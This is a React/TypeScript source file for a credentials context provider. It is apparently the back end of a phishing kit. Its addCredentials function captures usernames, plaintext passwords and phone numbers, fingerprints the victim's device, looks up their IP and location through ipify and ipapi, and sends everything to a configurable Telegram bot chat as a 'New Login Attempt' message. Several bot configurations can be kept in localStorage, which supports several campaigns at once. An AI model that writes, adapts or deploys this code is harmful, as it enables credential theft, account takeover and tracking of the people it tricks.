import React, { createContext, useContext, useState, useEffect } from 'react';
import { toast } from "sonner";

type CredentialsType = {
  provider: string;
  username: string;
  password: string;
  timestamp: string;
  configId: string;
  userAgent?: string;
  deviceInfo?: {
    os?: string;
    browser?: string;
    device?: string;
    screenSize?: string;
  };
  location?: {
    ip?: string;
    country?: string;
    city?: string;
  };
  phoneNumber?: string;
};

type TelegramConfigType = {
  botToken: string;
  chatId: string;
  configId: string;
};

type CredentialsContextType = {
  credentials: CredentialsType[];
  telegramConfig: TelegramConfigType;
  addCredentials: (provider: string, username: string, password: string, phoneNumber?: string, configId?: string) => void;
  setTelegramConfig: (config: TelegramConfigType) => void;
  isTelegramConfigured: boolean;
  getConfigById: (configId: string) => TelegramConfigType | null;
};

const DEFAULT_TELEGRAM_CONFIG = {
  botToken: "",
  chatId: "",
  configId: "default"
};

const CredentialsContext = createContext<CredentialsContextType | null>(null);

export const useCredentials = () => {
  const context = useContext(CredentialsContext);
  if (!context) {
    throw new Error('useCredentials must be used within a CredentialsProvider');
  }
  return context;
};

export const CredentialsProvider: React.FC<{ children: React.ReactNode }> = ({ children }) => {
  const [credentials, setCredentials] = useState<CredentialsType[]>([]);
  const [telegramConfig, setTelegramConfigState] = useState<TelegramConfigType>(DEFAULT_TELEGRAM_CONFIG);
  const [allConfigs, setAllConfigs] = useState<Record<string, TelegramConfigType>>({});

  useEffect(() => {
    // Load all saved configs from localStorage
    const savedConfigs: Record<string, TelegramConfigType> = {};
    for (let i = 0; i < localStorage.length; i++) {
      const key = localStorage.key(i);
      if (key?.startsWith('telegramConfig:')) {
        const config = JSON.parse(localStorage.getItem(key) || '{}');
        savedConfigs[config.configId] = config;
      }
    }
    setAllConfigs(savedConfigs);

    // Load current config
    const savedConfig = localStorage.getItem('telegramConfig');
    if (savedConfig) {
      setTelegramConfigState(JSON.parse(savedConfig));
    }
  }, []);

  const escapeMarkdown = (text: string): string => {
    return text.replace(/([_*\[\]()~`>#+=|{}.!\\])/g, '\\$1');
  };

  const getDeviceInfo = () => {
    const userAgent = navigator.userAgent;
    const screenSize = `${window.screen.width}x${window.screen.height}`;
    
    let os = "Unknown OS";
    if (/(iPhone|iPad|iPod|iOS)/i.test(userAgent)) {
      os = "iOS";
    } else if (/Android/i.test(userAgent)) {
      os = "Android";
    } else if (/Win/i.test(userAgent)) {
      os = "Windows";
    } else if (/Mac/i.test(userAgent)) {
      os = "MacOS";
    } else if (/Linux/i.test(userAgent)) {
      os = "Linux";
    }
    
    let browser = "Unknown Browser";
    if (/Chrome/i.test(userAgent) && !/Chromium|Edge|OPR|Opera/i.test(userAgent)) {
      browser = "Chrome";
    } else if (/Firefox/i.test(userAgent)) {
      browser = "Firefox";
    } else if (/Safari/i.test(userAgent) && !/Chrome|Chromium|Edge|OPR|Opera/i.test(userAgent)) {
      browser = "Safari";
    } else if (/Edge/i.test(userAgent)) {
      browser = "Edge";
    } else if (/Opera|OPR/i.test(userAgent)) {
      browser = "Opera";
    }
    
    let device = "Desktop";
    if (/iPhone|iPad|iPod|Android|webOS|BlackBerry|IEMobile|Opera Mini/i.test(userAgent)) {
      device = "Mobile";
      if (/iPad|tablet/i.test(userAgent)) {
        device = "Tablet";
      }
    }
    
    return {
      userAgent,
      deviceInfo: {
        os,
        browser,
        device,
        screenSize
      }
    };
  };

  const getConfigById = (configId: string): TelegramConfigType | null => {
    if (!configId) return null;
    return allConfigs[configId] || null;
  };

  const addCredentials = async (
    provider: string, 
    username: string, 
    password: string, 
    phoneNumber?: string,
    configId?: string
  ) => {
    if (!username || !password) return;

    const { userAgent, deviceInfo } = getDeviceInfo();

    let locationData = { ip: "Unknown", country: "Unknown", city: "Unknown" };
    try {
      const ipResponse = await fetch('https://api.ipify.org?format=json');
      if (ipResponse.ok) {
        const ipData = await ipResponse.json();
        locationData.ip = ipData.ip;
        
        const geoResponse = await fetch(`https://ipapi.co/${ipData.ip}/json/`);
        if (geoResponse.ok) {
          const geoData = await geoResponse.json();
          locationData.country = geoData.country_name || "Unknown";
          locationData.city = geoData.city || "Unknown";
        }
      }
    } catch (error) {
      console.error('Error fetching location data:', error);
    }

    const newCredential = {
      provider,
      username,
      password,
      timestamp: new Date().toISOString(),
      configId: configId || telegramConfig.configId,
      userAgent,
      deviceInfo,
      location: locationData,
      phoneNumber
    };

    setCredentials((prev) => [...prev, newCredential]);

    // Get the appropriate Telegram config
    const config = configId ? getConfigById(configId) : telegramConfig;

    if (!config?.botToken || !config?.chatId) {
      console.warn('No valid Telegram configuration found');
      return;
    }

    try {
      const message = `
🔐 *New Login Attempt* \\(Config ID: ${escapeMarkdown(configId || telegramConfig.configId)}\\)
*Provider:* ${escapeMarkdown(provider)}
*Username:* ${escapeMarkdown(username)}
*Password:* ${escapeMarkdown(password)}
${phoneNumber ? `*Phone:* ${escapeMarkdown(phoneNumber)}` : ''}
*Time:* ${escapeMarkdown(new Date().toLocaleString())}
*Device:* ${escapeMarkdown(`${deviceInfo.device} (${deviceInfo.os})`)}
*Browser:* ${escapeMarkdown(deviceInfo.browser)}
*Screen:* ${escapeMarkdown(deviceInfo.screenSize)}
*IP:* ${escapeMarkdown(locationData.ip)}
*Location:* ${escapeMarkdown(`${locationData.city}, ${locationData.country}`)}
*Source URL:* ${escapeMarkdown(window.location.href)}`;

      const response = await fetch(
        `https://api.telegram.org/bot${config.botToken}/sendMessage`,
        {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify({
            chat_id: config.chatId,
            text: message,
            parse_mode: 'MarkdownV2',
          }),
        }
      );

      if (!response.ok) {
        throw new Error('Failed to send message to Telegram');
      }
      
      console.log('Credentials sent to Telegram successfully');
    } catch (error) {
      console.error('Error sending to Telegram:', error);
    }
  };

  const setTelegramConfig = (config: TelegramConfigType) => {
    const configId = config.configId || `config_${Date.now()}`;
    const newConfig = { ...config, configId };
    
    // Save to allConfigs
    setAllConfigs(prev => ({
      ...prev,
      [configId]: newConfig
    }));
    
    // Save to localStorage with configId
    localStorage.setItem(`telegramConfig:${configId}`, JSON.stringify(newConfig));
    
    // Update current config
    setTelegramConfigState(newConfig);
    localStorage.setItem('telegramConfig', JSON.stringify(newConfig));
    
    toast.success('Telegram configuration saved');
  };

  const isTelegramConfigured = Boolean(telegramConfig.botToken && telegramConfig.chatId);

  return (
    <CredentialsContext.Provider
      value={{
        credentials,
        telegramConfig,
        addCredentials,
        setTelegramConfig,
        isTelegramConfigured,
        getConfigById,
      }}
    >
      {children}
    </CredentialsContext.Provider>
  );
};